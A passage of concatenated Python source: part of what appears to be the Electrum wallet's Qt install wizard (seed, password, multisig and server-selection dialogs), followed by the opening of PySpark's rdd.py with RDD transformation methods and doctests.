os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electrum. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.show_warning(_('Your wallet was upgraded successfully'))
self.wallet = Wallet(self.storage)
self.terminate()
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '%s' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?") % path
if not self.question(msg):
if self.question(_("Do you want to delete '%s'?") % path):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
self.terminate()
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next):
return self.text_input(title, message, is_valid)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.emit(QtCore.SIGNAL('synchronized'), msg)
self.connect(self, QtCore.SIGNAL('synchronized'), self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.emit(QtCore.SIGNAL('accept'))
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = map(lambda x: x[0], choices)
c_titles = map(lambda x: x[1], choices)
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(unicode(line.text()).split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
__all__ = ["RDD"]
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(15)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
# The RDD materialization time is unpredicable, if we set a timeout for socket reading
# operation, it will very possibly fail. See SPARK-18281.
sock.settimeout(None)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sock.makefile("rb", 65536))
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
